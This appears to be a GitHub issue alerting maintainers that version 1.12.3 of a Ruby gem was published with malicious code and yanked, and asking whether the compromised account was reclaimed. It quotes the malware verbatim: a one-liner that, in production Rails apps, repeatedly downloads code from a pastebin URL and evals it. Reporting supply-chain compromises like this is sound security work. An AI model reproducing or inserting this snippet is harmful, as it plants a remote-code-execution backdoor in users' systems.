Compromised version 1.12.3? #237
Description
Hi there,
I noticed that 1.12.3 was published and then yanked last week. It showed up on my radar because it contained the same malicious bits going around the rubygems world right now. i.e.
_!{require "open-uri";Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}
Wanted to confirm that you were aware, and that any compromised rubygems account had been reclaimed?